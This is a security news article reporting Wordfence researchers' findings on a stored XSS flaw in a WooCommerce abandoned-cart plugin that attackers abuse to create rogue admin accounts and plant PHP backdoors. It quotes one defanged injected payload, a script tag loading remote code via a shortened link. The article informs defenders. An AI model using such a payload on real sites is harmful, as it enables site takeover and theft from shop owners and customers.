Hackers abuse XSS vulnerability in cart plugin to target WordPress-based shopping sites

• The vulnerability exists in the ‘Abondoned Cart Lite for WooCommerce’ plugin that has more than 20,000 installs.
• The cybercriminals are abusing the vulnerability to plant backdoors and take control of other vulnerable sites.

WordPress-based shopping sites are being targeted by cybercriminals to plant backdoors and take control of other vulnerable sites. The cyber crooks are abusing a vulnerability in a shopping cart plugin ‘Abondoned Cart Lite for WooCommerce’ to target the sites.

What is the matter - According to Defiant, the company behind Wordfence, hackers are targeting WordPress sites that use the ‘Abondoned Cart Lite for WooCommerce’ plugin. It is reported that the plugin has been installed for more than 20,000 times across several WordPress sites. The plugin, allows site administrators to view abandoned shopping cart - where users add the required products in their carts before they suddenly leave the site.

How does the exploit work - The hackers leveraging the cross-site scripting (XSS) vulnerability in the plugin to create the perfect storm. They add exploit code in one of the shopping cart’s fields and then leave the site. In this way, the injected exploit code gets stored in the shop’s database without the knowledge of the owner. The attackers make use of URL shortening services like ‘bit.ly’ to load the exploit code on to the sites running the vulnerable plugin.

When an admin accesses the shop’s backend to view a list of abandoned carts, the hackers’ exploit code gets executed.

“The attacks on this vulnerability have been consistent in their execution. The attacker builds a cart, supplies bogus contact information, and abandons the cart. The names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, but the billing_last_name field contains the injected payload <script src=hXXps://bit[.]ly/2SzpVBY></script>,” Defiant researchers explained.

The code, thus injected plants two different backdoors on the WordPress sites.

About the backdoors - The first backdoor takes the form of a new admin account that hackers create on the site.

“This form is filled out with the information from the first few lines of the function seen above, with a username of “woouser” and an email address at Mailinator, a popular disposable inbox provider. The user is given the Administrator role, and the account is created,” Defiant researcher, Mikey Veenstra noted.

The second backdoor scans the list of all installed plugins to find if any inactive plugin is present. Once it finishes the scanning, the exploit code injects the new PHP backdoor script into the inactive plugin. This enables the hackers to send malicious instructions even if the plugin is in deactivate state.

The researchers cited that there have been more than 5,200 instances where the malicious ‘bit.ly’ link has been downloaded. This suggests that the number of infected sites is most likely in thousands.

Although the experts are yet to understand the motive behind this attack, it is believed that the attackers could be using these sites for anything from SEO spamming to planting card skimmer.